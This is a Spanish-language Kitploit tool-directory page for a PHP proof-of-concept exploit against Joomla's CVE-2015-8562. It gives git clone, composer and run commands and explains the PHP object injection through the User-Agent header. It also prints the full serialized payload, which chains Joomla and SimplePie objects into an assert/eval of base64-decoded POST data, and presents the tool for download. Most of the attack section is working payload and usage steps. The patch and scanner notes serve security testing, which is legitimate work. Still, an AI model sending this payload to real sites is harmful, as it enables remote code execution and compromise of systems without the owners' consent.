Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Joomla-CVE-2015-8562-PHP-POC — Una prueba de concepto para la vulnerabilidad CVE-2015-8562 de Joomla | Kitploit
Herramientas/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

Una prueba de concepto para la vulnerabilidad CVE-2015-8562 de Joomla

Ver Repositorio
23hace 10 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Joomla-CVE-2015-8562-PHP-POC

Una prueba de concepto para la vulnerabilidad CVE-2015-8562 de Joomla

Preview

Introducción

Esta PoC es una copia casi 1:1 de la implementación en Python de Gary alojada en exploit-db.

Cómo usarlo

Es muy fácil de instalar:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

Una vez que composer tenga todo instalado, deberás cambiar $target en exploit.php.

Después de eso, estás listo para continuar:

root@kitploit:~
php exploit.php

CVE-2015-8562

En diciembre de 2015 se encontró una vulnerabilidad en Joomla. Permite a atacantes remotos realizar ataques de inyección de objetos PHP y ejecutar código PHP arbitrario a través del encabezado HTTP User-Agent.

Esta vulnerabilidad afectó todas las versiones de Joomla. Ya se ha publicado un parche para las versiones v1.5.x, v2.5x y v3.x.

Si estás ejecutando PHP >= 5.4.45, >= 5.5.29 o >= 5.6.13 estás a salvo, ya que este exploit también utiliza CVE-2015-6835.

Nikos Verschore de PatrolServer realizó una entrada de blog muy detallada y fue de gran ayuda para entender esta vulnerabilidad. Puedes usar su mini-escáner de forma gratuita para verificar si tu sitio está en riesgo.

El exploit real

Así es como se ve el encabezado User-Agent enviado:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
Descargar herramienta